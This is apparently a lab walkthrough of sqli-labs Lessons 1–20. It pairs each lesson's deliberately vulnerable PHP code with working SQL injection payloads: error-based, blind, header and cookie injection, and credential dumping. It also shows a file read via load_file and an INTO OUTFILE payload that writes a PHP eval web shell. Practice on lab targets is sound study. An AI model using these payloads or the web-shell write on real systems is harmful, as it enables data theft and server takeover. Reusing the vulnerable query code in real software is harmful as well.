[20210417] 01 Basic Challenges (基础挑战)

Less - 01 GET - Error Based - Single Quotes String(报错显示 基于单引号)

<?php
error_reporting(0);
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
                echo 'Your Login name:'. $row['username'];
              echo 'Your Password:' .$row['password'];
    }else{
              print_r(mysql_error());
    }
}

http://sqli.test/Less-1/?id=1
http://sqli.test/Less-1/?id=1'and 1=1 -- #                // 有数据
http://sqli.test/Less-1/?id=1'and 1=2 -- #                // 无数据
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) -- #                        // XPATH syntax error: '^$root@localhost^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select database()),0x5e24),1)) -- #                    // XPATH syntax error: '^$security^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e24),1)) -- #                        // XPATH syntax error: '^$emails^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e24),1)) -- #                        // XPATH syntax error: '^$referers^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x5e24),1)) -- #                         // XPATH syntax error: '^$uagents^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x5e24),1)) -- #                        // XPATH syntax error: '^$users^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x5e24),1)) -- #            // XPATH syntax error: '^$id^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x5e24),1)) -- #            // XPATH syntax error: '^$username^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),0x5e24),1)) -- #            // XPATH syntax error: '^$password^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- #                //XPATH syntax error: '^$id:1 username:Dumb password:Du'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- #                // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb

Less - 02 GET - Error Based - Intiget Based (报错显示 数字型)

<?php
error_reporting(0);
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
                echo 'Your Login name:'. $row['username'];
              echo 'Your Password:' .$row['password'];
    }else{
          print_r(mysql_error());
    }
}

http://sqli.test/Less-2/?id=1 and 1=1            // 有数据
http://sqli.test/Less-2/?id=1 and 1=2            // 无数据
http://sqli.test/Less-2/?id=1 and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- #            // XPATH syntax error: '^$id:1 username:Dumb password:Du'
http://sqli.test/Less-2/?id=1 and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- #            // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb

Less - 03 GET - Error Based - Single Quotes With Twist String (报错显示 带括号的单引号)

<?php
error_reporting(0);
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
                echo 'Your Login name:'. $row['username'];
              echo 'Your Password:' .$row['password'];
    }else{
          print_r(mysql_error());
    }
}

http://sqli.test/Less-3/?id=1' )and 1=1 -- w                // 有数据
http://sqli.test/Less-3/?id=1' )and 1=2 -- w                // 无数据
http://sqli.test/Less-3/?id=1' ) and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- #            // XPATH syntax error: '^$id:1 username:Dumb password:Du'
http://sqli.test/Less-3/?id=1' ) and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- #            // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb

Less - 04 GET - Error Based - Double Quotes - String(报错显示 双引号)

<?php
error_reporting(0);
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id = '"' . $id . '"';
    $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
                echo 'Your Login name:'. $row['username'];
              echo 'Your Password:' .$row['password'];
    }else{
      print_r(mysql_error());
    }
}

http://sqli.test/Less-4/?id=1") and 1=1 -- +        // 有数据
http://sqli.test/Less-4/?id=1") and 1=2 -- +        // 无数据
http://sqli.test/Less-4/?id=1") and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- +                    // XPATH syntax error: '^$id:1 username:Dumb password:Du'
http://sqli.test/Less-4/?id=1") and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- +                    // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb

Less - 05 GET - Double Injection - Single Quotes - String(双注入 单引号)

<?php
    error_reporting(0);
  if(isset($_GET['id']))
  {
    $id=$_GET['id'];    
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
            echo 'You are in...........';
    }else{
      print_r(mysql_error());
    }
}

http://sqli.test/Less-5/?id=1' and 1=1 --+                // 有数据
http://sqli.test/Less-5/?id=1' and 1=2 --+                // 无数据
// 输出占位
http://sqli.test/Less-5/?id=1 ' order by 1,2,3 --+        // 有数据
http://sqli.test/Less-5/?id=1 ' order by 1,2,3,4 --+    // 报错
// 报错注入
http://sqli.test/Less-5/?id=1 ' union select 1,2,(updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+                                                                                                                                                                                                                // security
http://sqli.test/Less-5/?id=1'  union select 1,2,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= database() limit 0,1),0x7e),1)) --+                                                        // emails
http://sqli.test/Less-5/?id=1'  union select 1,2,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema= database() and table_name='users' limit 0,1),0x7e),1)) --+    // id
http://sqli.test/Less-5/?id=1'  union select 1,2,(updatexml(1,concat(0x7e,(select concat(id,username,password) from security.users limit 0,1),0x7e),1)) --+                                                                                                        // 1DumbDumb
// 报错读文件
http://sqli.test/Less-5/?id=1 ' union select 1,2,(updatexml(1,concat(0x7e,(load_file('C:/phpstudy_pro/WWW/sqli/shell.php')),0x7e),1)) --+

Less - 06 GET - Double Injection - Double Quotes - String (双注入 双引号)

<?php
    error_reporting(0);
  if(isset($_GET['id']))
  {
    $id=$_GET['id'];    
    $sql="SELECT * FROM users WHERE id="$id" LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
            echo 'You are in...........';
    }else{
      print_r(mysql_error());
    }
}

// 测试
http://sqli.test/Less-6/?id=1 " and 1=1 --+
http://sqli.test/Less-6/?id=1 " and 1=2 --+
// 与上一个一样的报错注入过程
http://sqli.test/Less-5/?id=1"  union select 1,2,(updatexml(1,concat(0x7e,(select concat(id,username,password) from security.users limit 0,1),0x7e),1)) --+                                                                                                        // 1DumbDumb

Less - 07 GET - Dump Into Outfile -String (文件导出)

<?php 
error_reporting(0);
if(isset($_GET['id']))
{
        $id=$_GET['id'];
        $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
        $result=mysql_query($sql);
        $row = mysql_fetch_array($result);
    if($row){
          echo 'You are in.... Use outfile......';
    }else{
            echo 'You have an error in your SQL syntax';
          //print_r(mysql_error());
    }
}

// 测试
http://sqli.test/Less-7/?id=1 ')) and 1=1 --+
http://sqli.test/Less-7/?id=1 ')) and 1=2 --+
// 写shell
http://sqli.test/Less-7/?id=1 ')) union select 1,2,0x273c3f70687020406576616c28245f504f53545b3132335d293b3f3e27 into outfile 'C:/phpstudy_pro/WWW/sqli/Less-7/shell.php' --+

Less - 08 GET - Blind - Boolian Based - Single Quotes (布尔盲注 单引号)

<?php
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
        $id=$_GET['id'];        
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
      if($row){
          echo 'You are in...........';
    }
    else{
    //echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    }
}

// 测试
http://sqli.test/Less-8/?id=1' and 1=1 --+
http://sqli.test/Less-8/?id=1' and 1=2 --+
// 盲注
http://sqli.test/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+

Less - 09 GET - Blind - Time Based - Single Quotes(时间盲注 单引号)

<?php
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
        echo 'You are in...........';
    }else{
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
    }
}

// 测试
http://sqli.test/Less-9/?id=1 ' and  sleep(4)  --+
// 延时盲注
http://sqli.test/Less-9/?id=1 ' and  if(ascii(substr(database(),1,1))=115,sleep(4),1) --+

Less - 10 GET - Time Based - Double Quotes (时间盲注 双引号)

<?php
error_reporting(0);
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id = '"'.$id.'"';
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
      echo 'You are in...........';
    }
    else 
    {
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    }
}

// 测试
http://sqli.test/Less-10/?id=1" and sleep(3) --+
// 时间盲注
http://sqli.test/Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(4),1) --+

Less - 11 POST - Error Based - Single Quotes - String (基于报错 单引号 字符型)

<?php
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
    }else{
        //echo "Try again looser";
        print_r(mysql_error());
    }
}

// 测试
[POST] uname=admin&passwd=admin'and+1=2%20--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin'and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)--+&submit=Submit

Less - 12 POST - Error Based - Double Quotes - String - with twist (基于报错 双引号 字符型 带括号)

<?php
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
    }else{
          print_r(mysql_error());
    }
}

// 测试
[POST] uname=admin&passwd=admin")and+1=2+--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin")and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)+--+&submit=Submit

Less - 13 POST - Double Injection - Single Quotes - String - with twist(双注入 单引号 字符型 带括号)

<?php
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
    }else{
        print_r(mysql_error()); 
    }
}
?>

// 测试 
[POST] uname=admin&passwd=admin')and+sleep(3)%20--+&submit=Submit
// 时间盲注
[POST] uname=admin&passwd=admin')and+if(ascii(substr(database(),1,1))=115,sleep(4),1)%20--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin')and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=Submit

Less - 14 POST - Double Injection - Double Quotes - String - with twist (双注入 双引号 字符型 带括号)

<?php
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
          //echo 'Your Login name:'. $row['username'];
          //echo 'Your Password:' .$row['password'];
      }else{
          print_r(mysql_error());
    }
}
?>

// 测试
[POST] uname=admin&passwd=admin"+and+sleep(3)%20--+&submit=Submit
// 时间盲注
[POST] uname=admin&passwd=admin"+and+if(ascii(substr(database(),1,1))=115,sleep(4),1)%20--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin"+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=

Less - 15 POST - Blind - Boolian/time Based - Single Quotes (布尔/时间盲注 单引号)

<?php
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
      $uname=$_POST['uname'];
      $passwd=$_POST['passwd'];
      @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
      $result=mysql_query($sql);
      $row = mysql_fetch_array($result);
      if($row){
            //echo 'Your Login name:'. $row['username'];
            //echo 'Your Password:' .$row['password'];
      }else{
            //print_r(mysql_error());
      }
}
?>

// 测试
[POST] uname=admin&passwd=admin'+and+sleep(3)%20--+&submit=Submit
//时间盲注
[POST] uname=admin&passwd=admin'+and+if(ascii(substr(database(),1,1))=115,sleep(3),1)%20--+&submit=Submit

Less - 16 POST - Blind - Boolian/Time Based - Double Quotes ( 布尔/时间盲注 双引号)

<?php
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
        //echo 'Your Login name:'. $row['username'];
        //echo 'Your Password:' .$row['password'];
    }else{
        //echo "Try again looser";
        //print_r(mysql_error());
    }
}
?>

// 测试
[POST] uname=admin&passwd=admin+")+and+sleep(3)--+&submit=Submit
// 时间盲注
[POST] uname=admin&passwd=admin+")+and+if(ascii(substr(database(),1,1))=115,sleep(3),1)--+&submit=Submit

Less - 17 POST - Update Query - Error Based - String (Update注入 基于报错)

<?php
error_reporting(0);
function check_input($value){
        if(!empty($value)){                                                                                            // empty:查变量是否为空
        $value = substr($value,0,15);                                                                // substr:取指定长度
        }
        if (get_magic_quotes_gpc()){                                                                        // 检查gpc是否开启
                $value = stripslashes($value);                                                            // stripslashes：除斜杠
        }if (!ctype_digit($value)){                                                                            // 检查是否为纯数组
                $value = "'" . mysql_real_escape_string($value) . "'";            // mysql_real_escape_string:字符转义
    }else{
            $value = intval($value);                                                                            // intval:获取变量的整数值
        }
    return $value;
    }
if(isset($_POST['uname']) && isset($_POST['passwd'])){
    $uname=check_input($_POST['uname']);  
    $passwd=$_POST['passwd'];
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
        $row1 = $row['username'];      
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        if (mysql_error()){
            print_r(mysql_error());
        }else{
            //echo " You password has been successfully updated " ;        
        }
        //echo 'Your Password:' .$row['password'];
      }
}
?>

// 对以上代码进行简单审计后发现只有uname参数进行了过滤,passwd并没有进行过滤,那么就从passwd入手注就行了
// 测试
[POST] uname=dumb&passwd=123'"+and+1=2%20--+&submit=Submit                        // 报错
// 报错注入
[POST] uname=dumb&passwd=123'+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=Submit
[POST] uname=dumb&passwd=1'+and+(select+1+from+(select+count(*),concat((select(select+concat(CAST(concat(username,password)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+&submit=Submit

update users set password = '1' and (select 1 from (select count(*),concat((select(select concat(CAST(concat(username,password) as char),0x7e)) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
update users set password = '1' and (
    select 1 from (
        select count(*),concat(
            (select(select concat(CAST(concat(username,password) as char),0x7e)) from users limit 0,1)
            ,
            floor(rand(0)*2)
            )x 
            from information_schema.tables group by x
        )a
    )

Less - 18 POST - Header Injection - Uagent Field - Error Based (Header头注入 Uagent字段 基于报错)

<?php
error_reporting(0);
function check_input($value){
    if(!empty($value)){
          $value = substr($value,0,20);
    }if (get_magic_quotes_gpc()){
          $value = stripslashes($value);
    }if (!ctype_digit($value)){
          $value = "'" . mysql_real_escape_string($value) . "'";
    }else{
          $value = intval($value);
    }
    return $value;
}
    $uagent = $_SERVER['HTTP_USER_AGENT'];                                                        // $_SERVER：获取服务器执行环境 HTTP_USER_AGENT：用户浏览器请求头
    $IP = $_SERVER['REMOTE_ADDR'];                                                                        // REMOTE_ADDR:当前用户IP
    echo 'Your IP ADDRESS is: ' .$IP;
if(isset($_POST['uname']) && isset($_POST['passwd'])){
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1){
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        echo 'Your User Agent is: ' .$uagent;
        print_r(mysql_error());            
    }else{
          print_r(mysql_error());
    }
}
?>

// 对上面代码进行简单审计发现一个用于记录用户登陆信息的功能,且该字段用户可控并且未进行字段过滤($uagent,$IP)
// 测试
[User-Agent] 'and 1=2                                                                                        // 报错
// 报错注入
[User-Agent] 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

Less - 19 POST - Header Injection - Referer Field - Error Based (Header头注入 Referer字段 基于报错)

<?php
error_reporting(0);
function check_input($value){
    if(!empty($value)){
          $value = substr($value,0,20);
    }if (get_magic_quotes_gpc()){
          $value = stripslashes($value);
    }if (!ctype_digit($value)){
          $value = "'" . mysql_real_escape_string($value) . "'";
    }else{
          $value = intval($value);
    }
    return $value;
}
    $uagent = $_SERVER['HTTP_REFERER'];                                                        // HTTP_REFERER:获取前一页面的 URL 地址
    $IP = $_SERVER['REMOTE_ADDR'];
if(isset($_POST['uname']) && isset($_POST['passwd'])){
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1){
       $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
       echo 'Your Referer is: ' .$uagent;
       mysql_query($insert);
       print_r(mysql_error());
    }else{
       print_r(mysql_error());
    }
}
?>

// 测试
[referer] 'and 1=2                                                                                        // 报错
// 报错注入
[referer] 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

Less - 20 POST - Cookie Injections - Uagent Field - Error Based (Cookie注入 Uagent字段 基于报错)

<?php
error_reporting(0);
if (!isset($_COOKIE['uname'])) {
    function check_input($value)
    {
        if (!empty($value)) {
            $value = substr($value, 0, 20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
        {
            $value = stripslashes($value);
        }
        if (!ctype_digit($value))       // Quote if not a number
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        } else {
            $value = intval($value);
        }
        return $value;
    }
    if (isset($_POST['uname']) && isset($_POST['passwd'])) {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        $sql = "SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        $cookee = $row1['username'];
        if ($row1) {
            setcookie('uname', $cookee, time() + 3600);
            header('Location: index.php');
            echo "I LOVE YOU COOKIES";
            print_r(mysql_error());
        } else {
            print_r(mysql_error());
        }
    }
} else {
    if (!isset($_POST['submit'])) {
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "YOUR USER AGENT IS : " . $_SERVER['HTTP_USER_AGENT'];
        echo "YOUR IP ADDRESS IS : " . $_SERVER['REMOTE_ADDR'];
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        $sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        $result = mysql_query($sql);
        if (!$result) {
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if ($row) {
            echo 'Your Login name:' . $row['username'];
            echo 'Your Password:' . $row['password'];
            echo 'Your ID:' . $row['id'];
        } else {
        }
        echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
    } else {
        echo " Your Cookie is deleted";
        setcookie('uname', $row1['username'], time() - 3600);
        header('Location: index.php');
    }
}

// 测试
[cookie] uname=Dumb 'and 1=1 --+
[cookie] uname=Dumb 'and 1=2 --+
// 报错注入
[cookie] uname=Dumb 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+